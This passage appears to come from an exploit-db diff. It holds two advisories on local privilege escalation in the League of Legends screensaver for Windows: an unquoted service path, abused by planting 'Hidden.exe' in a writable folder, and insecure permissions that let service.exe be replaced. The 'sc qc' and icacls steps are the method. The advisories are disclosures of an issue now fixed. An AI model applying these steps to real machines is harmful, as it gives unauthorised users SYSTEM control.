Simply run 'sc qc lolscreensaver' and check for unquoted service path.
If the path is unquoted, then check the permissions of each directory
using space as a token.
Eg. D:\My Games\Hidden Files\Super Secure\Riot Games\service\service.exe
Do icacls on D:\, 'D:\My Games\', 'D:\My Games\Hidden Files\', 'D:\My
Games\Hidden Files\Super Secure\'. If you are able to write files to
any of these directories, it is exploitable.
If 'D:\My Games\' is writable, to exploit this issue, place a binary
to run as SYSTEM into the folder and named as 'Hidden.exe".
This is released on exploit-db as a means to make users aware. There was no way to automatically install a patch or update to fix this issue. It is recommended that the screensaver is uninstalled and redownloaded from the official website where this issue is now resolved.

32
platforms/windows/local/39903.txt Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: League of Legends Screensaver Insecure File Permissions
Privilege Escalation
# CVE-ID: NA
# Date: 13/04/2016
# Exploit Author: Vincent Yiu
# Contact: vysec.private@gmail.com
# Vendor Homepage: http://www.leagueoflegends.com
# Software Link: screensaver.euw.leagueoflegends.com/en_US
# Version: MD5 Hash: 0C1B02079CA8BF850D59DD870BC09963
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The League of Legends screensaver was installed with insecure file
permissions. It was found that all folder and file permissions were
incorrectly configured during installation. It was possible to replace the
service binary.
This was reported to Riot Games and has been rectified in the latest
version.
2. Proof
http://i.imgur.com/5fVijDK.png
3. Exploit:
Replace service.exe in 'C:\Riot Games\LolScreenSaver\service' to run
service.exe as SYSTEM.
This is released on exploit-db as a means to make users aware. There was no way to automatically install a patch or update to fix this issue. It is recommended that the screensaver is uninstalled and redownloaded from the official website where this issue is now resolved.